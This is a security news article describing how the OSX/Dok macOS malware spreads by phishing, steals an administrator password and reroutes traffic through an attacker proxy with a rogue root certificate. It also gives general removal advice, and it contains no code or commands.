A new strain of OS X malware grants attackers access to all victim communication, including messages encrypted by SSL, upon successful infection.
An attack begins when a user receives a phishing message that contains a bundle for the malware, known as OSX/Dok, in a .zip archive called Dokument.zip. The malware bundle goes by the name “Truesteer.AppStore.” One “Seven Muller” signed it on 21 April 2017, and Apple originally authenticated the developer certificate. According to Malwarebytes, the tech giant has since revoked the certificate used to sign the app, an action which causes a warning dialog box to pop up if the user attempts to unzip the .zip archive.
If the user skirts that protective measure, a fake alert pops up and displays a warning that the file could not be opened. Dok uses this alert as a cover to copy itself to the /Users/Shared/ folder and execute itself there. It will also use that location to add itself to the user’s login items, which means it will re-open at the next login.
Ofer Caspi of Check Point’s malware research team explains what happens next in a blog post:
“The malicious application will then create a window on top of all other windows. This new window contains a message, claiming a security issue has been identified in the operating system that an update is available, and that to proceed with the update, the user has to enter a password as shown in the picture below. The malware checks the system localization, and supports messages in both German and English.”
Dok wants the user to enter in their password. Why? So that it can gain administrator privileges and thereby install Homebrew, a command line installation tool which it uses to install TOR and SOCAT. The former allows a user to connect to the dark web, whereas the latter shuffles data between two communications. At that point, the malware gives the user administrator privileges and changes their network settings so that a proxy under a bad actor’s control filters all outgoing HTTP and HTTPS connections. Dok then installs a root certificate, which grants the malware the ability to perform a man in the middle (MitM) attack, impersonate any website the user visits, and tamper with their traffic.
Two LaunchAgents files redirect traffic to the proxy file through a dark web address. Victims should delete these files to remove the malware from their machines. They will also need to remove the bad certificate from their System keychain and use a good text editor to reverse some modifications made to the sudoers file. Finally, they can elect to remove the command line tools, but that’s not an easy process.
News of Dok comes more than a year after the security industry first met KeRanger, a fully functional ransomware targeting OS X users.